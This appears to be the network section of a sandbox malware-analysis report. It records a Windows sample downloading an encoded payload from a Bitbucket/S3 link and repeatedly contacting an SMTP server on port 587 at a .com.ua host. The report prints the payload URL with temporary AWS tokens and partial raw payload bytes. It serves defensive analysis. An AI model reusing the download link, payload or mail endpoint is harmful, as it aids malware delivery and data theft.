                                                                                                                      Dec 6, 2024 11:04:41.918875933 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.918930054 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.924700022 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.924715042 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.924807072 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.924843073 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.924860954 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.924946070 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.931322098 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.931338072 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.931365013 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.931384087 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.931392908 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.935122013 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.937912941 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.937932968 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.937992096 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.938002110 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.938036919 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.944328070 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.944370985 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.944478035 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.944478035 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.944497108 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.951450109 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.951493979 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.951539040 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.951550961 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.951581955 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.953116894 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.953166008 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.953172922 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.953202009 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.953214884 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.953243971 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.954341888 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.954997063 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.955008984 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.955020905 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.955024958 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:46.429469109 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:04:46.550275087 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:46.551199913 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:04:46.556313038 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:04:46.676202059 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.868566990 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.868640900 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:08.868690968 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.868722916 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:08.868738890 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:08.988600969 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:09.024956942 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:09.147058010 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:09.147212029 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:09.151642084 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:09.272100925 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:31.035358906 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:31.035427094 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:31.035489082 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:31.155246973 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:32.048573971 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:32.170948982 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:32.171051979 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:32.175039053 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:32.294866085 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.067122936 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.067255020 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.067255020 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.068022013 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.188878059 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.189174891 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.189276934 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.193501949 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.313479900 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:16.114744902 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:16.114806890 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:16.114850044 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:16.234723091 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:17.126903057 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:17.247009039 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:17.247102022 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:17.289747000 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:17.409507990 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.162054062 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.162174940 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.162174940 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.163062096 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.281975031 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.282757044 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.282905102 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.287462950 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.408077955 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:01.193840027 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:01.193957090 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:01.194004059 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:01.313745975 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:02.218849897 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:02.338536978 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:02.338625908 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:02.342344046 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:02.462030888 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.256603956 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.260478973 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.260478973 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.287060022 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.380312920 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.406891108 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.406996965 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.428097963 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.547996998 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:46.319555998 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:46.319798946 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:46.319843054 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:46.439730883 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:47.331578016 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:47.451697111 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:47.451777935 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:47.456345081 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:47.576332092 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.366980076 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.367054939 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.367120981 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.368045092 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.487066031 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.487739086 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.487812996 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.492616892 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.612917900 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:31.397094011 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:31.397224903 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:31.397270918 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:31.517879009 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:32.407499075 CET500335874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:32.527394056 CET587450033104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:32.527499914 CET500335874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:32.530946970 CET500335874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:32.650913954 CET587450033104.243.42.254192.168.2.6

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 6, 2024 11:04:34.772007942 CET5331853192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:04:34.910337925 CET53533181.1.1.1192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:37.785144091 CET6042253192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET53604221.1.1.1192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:45.958952904 CET5854853192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:04:46.426315069 CET53585481.1.1.1192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.871130943 CET5531553192.168.2.61.1.1.1
                                                                                                                      Dec 6, 2024 11:05:09.022907972 CET53553151.1.1.1192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 6, 2024 11:04:34.772007942 CET192.168.2.61.1.1.10x57feStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:37.785144091 CET192.168.2.61.1.1.10x412fStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:45.958952904 CET192.168.2.61.1.1.10x70c3Standard query (0)zara.master-workdone.com.uaA (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:05:08.871130943 CET192.168.2.61.1.1.10x77cbStandard query (0)manazara.master-workdone.com.uaA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 6, 2024 11:04:34.910337925 CET1.1.1.1192.168.2.60x57feNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:34.910337925 CET1.1.1.1192.168.2.60x57feNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:34.910337925 CET1.1.1.1192.168.2.60x57feNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.3A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com16.15.185.191A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.167A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com54.231.225.1A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com3.5.12.237A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com3.5.10.193A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com52.217.138.57A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:38.105323076 CET1.1.1.1192.168.2.60x412fNo error (0)s3-w.us-east-1.amazonaws.com52.217.168.49A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:04:46.426315069 CET1.1.1.1192.168.2.60x70c3No error (0)zara.master-workdone.com.ua104.243.42.254A (IP address)IN (0x0001)false
                                                                                                                      Dec 6, 2024 11:05:09.022907972 CET1.1.1.1192.168.2.60x77cbNo error (0)manazara.master-workdone.com.ua104.243.42.254A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • bitbucket.org
                                                                                                                      • bbuseruploads.s3.amazonaws.com

                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649716185.166.143.50443616C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-06 10:04:36 UTC206OUTGET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bitbucket.org
                                                                                                                      2024-12-06 10:04:37 UTC5941INHTTP/1.1 302 Found
                                                                                                                      Date: Fri, 06 Dec 2024 10:04:37 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 0
                                                                                                                      Server: AtlassianEdge
                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F [TRUNCATED]
                                                                                                                      Expires: Fri, 06 Dec 2024 10:04:37 GMT
                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                      X-Used-Mesh: False
                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                      Content-Language: en
                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                      X-Served-By: 8d65951decf2
                                                                                                                      X-Version: 7795cf3afeec
                                                                                                                      X-Static-Version: 7795cf3afeec
                                                                                                                      X-Request-Count: 535
                                                                                                                      X-Render-Time: 0.05843043327331543
                                                                                                                      X-B3-Traceid: 0908e3acae184abe80f38ff977dca7c2
                                                                                                                      X-B3-Spanid: 1c9f1710759b292d
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss:// [TRUNCATED]
                                                                                                                      X-Usage-Quota-Remaining: 998964.039
                                                                                                                      X-Usage-Request-Cost: 1053.00
                                                                                                                      X-Usage-User-Time: 0.031590
                                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                      Age: 0
                                                                                                                      X-Cache: MISS
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                      Atl-Traceid: 0908e3acae184abe80f38ff977dca7c2
                                                                                                                      Atl-Request-Id: 0908e3ac-ae18-4abe-80f3-8ff977dca7c2
                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                      Server-Timing: atl-edge;dur=169,atl-edge-internal;dur=3,atl-edge-upstream;dur=167,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.6497183.5.30.3443616C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-06 10:04:39 UTC1263OUTGET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2Bo [TRUNCATED]
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bbuseruploads.s3.amazonaws.com
                                                                                                                      2024-12-06 10:04:39 UTC565INHTTP/1.1 200 OK
                                                                                                                      x-amz-id-2: lFQd/X3AS0GZww7qvpXTe4DGDBvpA+nsWo6fo9GPXGTAqP97u9odJ2RFhvRKIVT+OjOlxPiMe+5b0PRCl/Z5G6Gm/5HPdcXh
                                                                                                                      x-amz-request-id: R6N4THEHDATJP71F
                                                                                                                      Date: Fri, 06 Dec 2024 10:04:40 GMT
                                                                                                                      Last-Modified: Mon, 04 Nov 2024 01:50:31 GMT
                                                                                                                      ETag: "a7b36584f976a88fe80fb9631e99a894"
                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                      x-amz-version-id: wchkc_KMtqDQrMURglLC.3O6bR5_lKAL
                                                                                                                      Content-Disposition: attachment; filename="165_Dlaybpxloke"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 1101624
                                                                                                                      Server: AmazonS3
                                                                                                                      Connection: close
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 59 6d 70 68 46 64 39 6a 62 51 66 58 34 73 7a 67 30 39 7a 59 79 74 66 6a 33 4e 54 5a 31 39 6a 61 31 38 33 57 32 74 54 4d 31 64 6e 54 34 74 2f 67 79 74 44 62 79 2b 48 57 32 39 72 50 7a 4e 66 65 79 74 76 51 7a 74 76 61 7a 74 6e 55 33 39 37 53 34 4e 2f 53 31 64 6e 54 33 74 54 61 32 4e 54 58 34 63 76 59 33 39 44 57 30 63 7a 62 31 74 37 62 34 4e 72 64 79 74 50 62 79 75 48 6a 34 4d 2f 51 32 39 62 55 31 2b 48 4c 30 73 37 68 32 4e 6e 54 30 38 37 65 32 4e 4c 56 7a 75 4c 4b 7a 38 37 56 31 39 58 68 79 74 48 63 34 65 44 69 59 6d 70 68 46 64 39 6a 62 51 63 4c 31 63 72 69 79 39 6e 68 31 64 6a 55 7a 6d 4a 71 59 52 58 66 59 32 30 48 4a 7a 41 61 4c 69 4d 71 4a 68 67 6e 4d 7a 49 70 75 2f 73 55 5a 47 68 74 45 34 72 6e 58 44 4b 6a 68 75 70 44 61 30 69 4e 6d 4c 46 62 62 6a 51
                                                                                                                      Data Ascii: YmphFd9jbQfX4szg09zYytfj3NTZ19ja183W2tTM1dnT4t/gytDby+HW29rPzNfeytvQztvaztnU397S4N/S1dnT3tTa2NTX4cvY39DW0czb1t7b4NrdytPbyuHj4M/Q29bU1+HL0s7h2NnT087e2NLVzuLKz87V19XhytHc4eDiYmphFd9jbQcL1criy9nh1djUzmJqYRXfY20HJzAaLiMqJhgnMzIpu/sUZGhtE4rnXDKjhupDa0iNmLFbbjQ
                                                                                                                      2024-12-06 10:04:40 UTC459INData Raw: 6c 4d 71 4f 7a 58 6f 4b 67 6f 46 39 64 48 75 6b 6a 6f 78 35 52 34 63 75 69 43 32 4b 30 49 53 67 6a 57 43 49 57 59 78 79 68 6f 43 56 67 59 4a 42 66 51 69 43 41 49 68 62 6a 30 71 4e 50 6f 34 64 67 65 64 36 31 5a 48 56 66 62 79 4a 76 34 44 2f 6b 31 69 43 5a 35 4e 71 69 37 4b 42 53 59 30 62 67 64 78 39 46 58 6e 7a 66 57 32 47 74 70 42 52 67 53 4f 52 35 35 43 2f 6b 50 4f 4f 2f 59 70 67 65 46 69 54 57 43 49 70 4a 71 30 6f 4a 72 34 6b 70 73 57 30 75 36 63 46 6e 71 6d 67 64 72 42 46 74 69 69 6f 70 36 52 2f 74 70 57 67 53 4b 63 5a 74 7a 47 6a 79 61 4c 4b 70 4e 4f 72 78 36 54 44 72 75 2b 6f 61 36 6a 4d 72 47 53 74 61 37 46 30 70 61 57 74 69 37 4b 36 72 42 43 6a 2b 36 42 68 73 4a 61 4d 4b 5a 62 66 69 61 64 35 6c 6f 4c 59 67 64 6c 39 45 48 70 2f 67 48 47 47 46 33 6e
